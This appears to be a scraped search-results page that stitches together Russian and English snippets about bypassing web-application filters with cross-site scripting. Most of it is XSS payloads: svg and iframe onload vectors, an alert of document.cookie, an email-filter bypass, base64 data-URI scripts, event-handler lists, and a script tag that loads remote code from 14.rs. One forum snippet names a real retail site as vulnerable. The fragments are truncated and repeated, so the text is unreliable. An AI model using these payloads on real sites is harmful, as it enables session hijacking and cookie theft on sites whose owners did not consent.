Методы обхода защитных средств веб-приложений при... / Хабр
...onFinish onFocus onFocusIn onFocusOut onHashChange onHelp onInput onKeyDown onKeyPress onKeyUp onLayoutComplete onLoad onLoseCapture onMediaComplete onMediaError onMessage onMouseDown onMouseEnter onMouseLeave onMouseMove onMouseOut onMouseOver.
Xss Injection | XSS in SVG (short)
Bypass email filter. (RFC compliant). "><svg/onload=confirm(1)>"@x.y. Bypass document blacklist.
XSS уязвимость taburetka.ua - Форум... — Zelenka.guru (Lolzteam)
Вчера нашел XSS уязвимость на сайте [Войдите или зарегистрируйтесь для просмотра ссылок]><svg onload=alert
Top 500 Наиболее важных XSS скриптов для тестирования на...
...div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript
GitHub - FierceTaipan/vuln
Пробелы между аттрибутами в тэге могут заменить слэшем <iframe/onload='alert()' - необязательно закрывать тэг.
Cross-site scripting (XSS)
rootsector.blogspot.com
<script src=14.rs> you can alsoo specify an arbitratry payload with 14.rs/#payload e.g: 14.rs/#alert(document.domain).
XSS (Cross Site Scripting) - HackTricks
<iframe srcdoc="<svg onload=alert(4);>"> Other obfuscation tricks. In this case the HTML encoding and the Unicode encoding trick from the previous section is also valid as you are inside an attribute.
Полезная нагрузка, связанная с XSS, и памятка обхода - Русские...
XSS с использованием данных. data:text/html,<script>alert(0)</script>data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ
Методы обхода защитных средств веб-приложений при...
...onFinish onFocus onFocusIn onFocusOut onHashChange onHelp onInput onKeyDown onKeyPress onKeyUp onLayoutComplete onLoad onLoseCapture onMediaComplete onMediaError onMessage onMouseDown onMouseEnter onMouseLeave onMouseMove onMouseOut onMouseOver.
</script><svg onload=alert(document.cookie)> — Яндекс Кью
спрашивает</script><svg onload=alert(document.cookie)> · 1 ответ.